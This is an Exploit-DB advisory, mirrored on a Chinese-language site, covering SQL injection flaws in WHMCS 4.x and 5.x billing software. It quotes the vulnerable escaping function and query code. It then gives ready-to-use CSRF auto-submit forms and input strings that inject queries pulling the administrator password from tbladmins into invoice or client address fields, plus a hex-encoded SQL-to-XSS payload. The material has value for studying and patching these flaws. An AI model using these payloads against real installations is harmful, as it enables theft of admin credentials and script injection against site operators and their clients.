WHMCompleteSolution (WHMCS) 4.x/5.x – Multiple Web Vulnerabilities

  • 作者: AhwAk20o0 --
    日期: 2013-12-12
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/30246/
  • # Exploit Title: WHMCS v4.x & v5.x - Multiple Web Vulnerabilities
    # Date: 2013-12-10
    # Exploit Author: ahwak2000
    # Vendor Homepage: http://whmcs.com/
    # Version: 4.x , 5.x
    # Tested on: win 7
    | Vulnerability| 
    File : includes\dbfunctions.php 
    function db_escape_string($string) {
    $string = mysql_real_escape_string($string);
    return $string;
    | Description| 
    the script use this function to secure the input
    the function disable only the ' and "
    but we can bypass itif the query don't use '
    | Example| 
    file : admin/invoices.php
    $query = "UPDATE tblinvoices SET credit=credit-" . db_escape_string($removecredit) . " WHERE id='" . db_escape_string($id) . "'";
    CSRF to SQL And Bypass Token
    <body onload="submitForm()">
    <form name="myForm" id="myForm"
    action="http://localhost/whmcs5214/admin/invoices.php" method="post">
    <input type="hidden" name="token" value="ahwak2000">
    <input type="hidden" name="id" value="1">
    <input type="hidden" name="removecredit" value="-99,invoicenum=(select password from tbladmins limit 0,1)">
    <input type="hidden" name="action" value="edit">
    <script type='text/javascript'>document.myForm.submit();</script>
    <body onload="submitForm()">
    <form name="myForm" id="myForm"
    action="http://localhost/whmcs5214/admin/invoices.php" method="post">
    <input type="hidden" name="token" value="ahwak2000">
    <input type="hidden" name="id" value="1">
    <input type="hidden" name="addcredit" value="-99,invoicenum=(select password from tbladmins limit 0,1)">
    <input type="hidden" name="action" value="edit">
    <script type='text/javascript'>document.myForm.submit();</script>
    | Example 2| 
    file : includes/invoicefunctions.php
    function applyCredit($invoiceid, $userid, $amount="", $noemail = "") {
    	$query = "UPDATE tblinvoices SET credit=credit+" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($invoiceid) . "'";
    	$query = "UPDATE tblclients SET credit=credit-" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($userid) . "'";
    File: /viewinvoice.php
    if ($invoice->getData("status") == "Unpaid" && 0 < $creditbal) {
    	$creditamount = $whmcs->get_req_var("creditamount");
    	if ($whmcs->get_req_var("applycredit") && 0 < $creditamount) {
    		if ($creditbal < $creditamount) {
    			echo $_LANG['invoiceaddcreditovercredit'];
    		else {
    			if ($balance < $creditamount) {
    				echo $_LANG['invoiceaddcreditoverbalance'];
    			else {
    				applyCredit($invoiceid, $invoice->getData("userid"), $creditamount);
    		redir("id=" . $invoiceid);
    	$smartyvalues['manualapplycredit'] = true;
    	$smartyvalues['totalcredit'] = formatCurrency($creditbal) . generate_token("form");
    	if (!$creditamount) {
    		$creditamount = ($balance <= $creditbal ? $balance : $creditbal);
    	$smartyvalues['creditamount'] = $creditamount;
    Go to<~ edit
    if client have creditt and when he want to pay with credit 
    in the "Enter the amount to apply:" put 0.01,Address2=(SELECT password from tbladmins limit 0,1)
    the admin password will be in the client address
    sql => xss
    SQL can convert to XSS 
    Must Encode XSS to Hex
    Example :
    (SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E) //<script>alert('ahwak2000');</script>
    SQL can be modified to work when all members and supervisors
    (SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)# <~